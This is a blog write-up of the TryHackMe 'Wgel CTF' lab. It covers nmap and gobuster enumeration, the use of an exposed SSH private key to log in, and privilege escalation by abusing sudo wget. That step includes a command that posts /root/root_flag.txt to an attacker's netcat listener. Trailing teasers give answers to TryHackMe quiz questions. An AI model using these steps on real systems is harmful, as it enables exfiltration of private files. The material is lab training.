Skip to main content

Wgel CTF

 

tryhackme - wgel CTF

 

NMAP - network mapper

first we are going to do is a general nmap (network mapper) scan so that we get to know how many ports are opened.

# nmap -sT -vv -sC -sV <ip>

 



HTTP

summary of nmap:-

will see here 2 ports are open which are 80 and 22 . Port 22 is used to connect to SSH so with this help we got to know that we can connect through ssh and port 80 is for the HTTP that means it is hosting a website so lets run that IP in our browser.

 



gobuster 

its look like an apache2 server then quick i got an idea of brute-forcing the website with some common extensions. so, to run a brute-force of extensions on website we use a tool called gobuster.

command:- gobuster dir -u <site URL> -w <word list> -x <extn>


root@:~# gobuster dir -u http://10.10.116.173/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q 
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
/sitemap (Status: 301)

 

so here, we found something extension directory on  /sitemap. so i had checked it on my extension then found this.

 


 

lets,check we have any directory in our host..

 

root@:~# gobuster dir -u http://10.10.116.173/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q 
/.ssh (Status: 301)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/services.html (Status: 200)
/shop.html (Status: 200)
/work.html (Status: 200)


ya! we found for .ssh directory then i had opened the extension and found an id_rsa file.It was interesting..

 

here ,id_rsa key ..


then, remember something at starting of this we had an ssh connection possible. and check here the source code of the first wep page we found an user name called jessie.

 


 

 

 

user_flag.txt

to make sure u give a proper permissions to execute the file id_rsa as we know that.

#command - chmod 600 id_rsa

then,run this code to connect:

#ssh -i id_rsa jessie@<ipaddress>

 


 


root_flag.txt  

first we know about privilege escalations the sudo -l to find what are available then i found it has no password so we cannot create a payload for root user then i had got an idea of exploiting vulnerability! then i had created.

# nc -lvnp 4444

on my machine i.e attackers machine

let's check here - https://gtfobins.github.io/gtfobins/wget/

command : sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<Tunnel IP>:4444



then we go for netcat,

# nc -lvnp 4444

we found on root flag here,

 

 

 





Comments

Post a Comment

Popular posts from this blog

Windows Fundamentals 2

 TryHackMe - Windows Fundamentals 2 Task 1 Introduction  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed Task 2 System Configuration   #2.1 :- What is the name of the service that lists Systems Internals as the manufacturer?  Answer :- PsShutdown #2.2 :- Whom is the Windows license registered to? Answer :- Windows User #2.3 :- What is the command for Windows Troubleshooting? Answer :- C:\Windows\System32\control.exe /name Microsoft.Troubleshooting #2.4 :- What command will open the Control Panel? (The answer is  the name of .exe, not the full path) Answer :- control.exe Task 3 Change UAC Settings  #3 :- What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)  Answer :- UserAccountControlSettings.exe Task 4 Computer Management  #4.1 :- What is the command to open Computer Management? (The answer is the name of the .msc file, not the full
Post a Comment
Read more

Windows Fundamentals 3

 Tryhackme - Windows Fundamentals 3   Task-1 Introduction  #1:- Read the above and start the virtual machine.  Answer:- No Answer Needed Task-2 Windows Updates  #2:- There were two definition updates installed in the attached VM. On what date were these updates installed?  Answer:- 5/3/2021 Task-3 Windows Security  #3:- In the above image, which area needs immediate attention?  Answer:- virus & threat protection Task-4 Virus & threat protection  #4:- Specifically, what is turned off that Windows is notifying you to turn on?  Answer:- Real-time protection Task-5 Firewall & network protection  #5:- If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?  Answer:- public network Task-6 App & browser control  #6:- Read the above.  Answer:- No Answer Needed Task-7 Device security  #7:- What is the TPM?  Answer:- Trusted Platform Module Task-8 BitLocker #8:- What must a user insert on computers that DO NOT have a TPM version 1.2 or la
Post a Comment
Read more

Linux Fundamentals Part 1

TryHackMe - Linux FundamentalsPart 1  #1 :- Research: What year was the first release of a Linux operating system?  Answer :-1991  #2 :- if we wanted to output the text "TryHackMe", what would our command be?  Answer :-echo TryHackMe  #3 :- What is the username of who you're logged in as on your deployed Linux machine? Answer :-tryhackme #4 :- On the Linux machine that you deploy, how many folders are there?    Answer :-2 #5 :- Which directory contains a file?  Answer :-folder4 #6 :- What is the contents of this file? Answer :-Hello World #7 :- Use the cd command to navigate to this file and find out the new current working directory. What is the path? An
Post a Comment
Read more